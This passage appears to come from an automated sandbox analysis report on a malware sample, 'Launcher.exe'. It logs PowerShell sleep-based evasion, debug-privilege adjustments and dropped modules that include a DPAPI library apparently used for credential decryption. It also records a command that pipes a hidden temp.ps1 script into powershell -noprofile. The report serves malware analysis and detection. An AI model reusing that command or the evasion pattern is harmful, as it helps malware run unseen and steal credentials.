        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9095Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 810Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1567Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5702Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1417Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5429Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1702Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4561Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1427
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4772
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1795
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4332
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1748
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4489
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1498
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4465
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2077
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3960
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1800
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4416
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1994
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3808
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1402
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4520
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2665
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3395
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1633
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3918
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1745
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4067
        Source: C:\Users\user\Desktop\Launcher.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node.bakJump to dropped file
        Source: C:\Users\user\Desktop\Launcher.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pkg\0de74a34d95a30eed84cdf31f0dc5868c59b7977d3d496845c9363812235b768\@primno\dpapi\prebuilds\win32-x64\node.napi.node.bakJump to dropped file
        Source: C:\Users\user\Desktop\Launcher.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pkg-RIXWqQ\59b07c111ff3cdb6a2d6d93c23513b9ec89195f53f0a55a3a7769a9f164e6041Jump to dropped file
        Source: C:\Users\user\Desktop\Launcher.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pkg-RIXWqQ\b9a7b76665d92af2d90cc6a15ffdc1a79635559cbc1c40bd1f83c4c4449cd442Jump to dropped file
        Source: C:\Users\user\Desktop\Launcher.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.nodeJump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\anq2mtqn\anq2mtqn.dllJump to dropped file
        Source: C:\Users\user\Desktop\Launcher.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pkg\0de74a34d95a30eed84cdf31f0dc5868c59b7977d3d496845c9363812235b768\@primno\dpapi\prebuilds\win32-x64\node.napi.nodeJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5904Thread sleep count: 9095 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5904Thread sleep count: 810 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6668Thread sleep time: -6456360425798339s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6748Thread sleep count: 1567 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6748Thread sleep count: 5702 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4552Thread sleep time: -2767011611056431s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6176Thread sleep count: 1417 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3876Thread sleep count: 5429 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2060Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1748Thread sleep time: -2767011611056431s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2552Thread sleep count: 1702 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2552Thread sleep count: 4561 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3476Thread sleep time: -1844674407370954s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3984Thread sleep time: -2767011611056431s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4716Thread sleep count: 1427 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4724Thread sleep count: 4772 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4860Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6020Thread sleep time: -2767011611056431s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4752Thread sleep count: 1795 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4752Thread sleep count: 4332 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4684Thread sleep time: -1844674407370954s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5532Thread sleep count: 1748 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5532Thread sleep count: 4489 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5504Thread sleep time: -1844674407370954s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1624Thread sleep time: -1844674407370954s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5440Thread sleep count: 1498 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 448Thread sleep count: 4465 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 548Thread sleep time: -3689348814741908s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5968Thread sleep count: 2077 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2396Thread sleep count: 3960 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6716Thread sleep time: -1844674407370954s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5156Thread sleep count: 1800 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5156Thread sleep count: 4416 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6608Thread sleep time: -2767011611056431s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6268Thread sleep count: 1994 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6268Thread sleep count: 3808 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6212Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3840Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5260Thread sleep count: 1402 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5260Thread sleep count: 4520 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1456Thread sleep time: -3689348814741908s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6180Thread sleep count: 2665 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6180Thread sleep count: 3395 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6352Thread sleep time: -2767011611056431s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1868Thread sleep count: 1633 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1868Thread sleep count: 3918 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 392Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5560Thread sleep time: -1844674407370954s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1220Thread sleep count: 1745 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1832Thread sleep count: 4067 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 428Thread sleep time: -1844674407370954s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFC9FC33ECA GetSystemInfo,22_2_00007FFC9FC33ECA
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\catroot2
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\System32\AppxSip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Data\
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\System32\WindowsPowerShell\v1.0\pwrshsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SYSTEM32\OpcServices.DLL
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Data\96630093aeac18623f8eafa5a10c8ba7\System.Data.ni.dll
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: lgnW2/4/PEZB31jiVg88O8EckzXZOFKs7sjsLjBOlDW0JB9LeGna8gI4zJVSk/BwJVmcIGfE
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "hostname"Jump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "type C:\Users\user\AppData\Roaming\temp.ps1 | powershell.exe -noprofile -"Jump to behavior
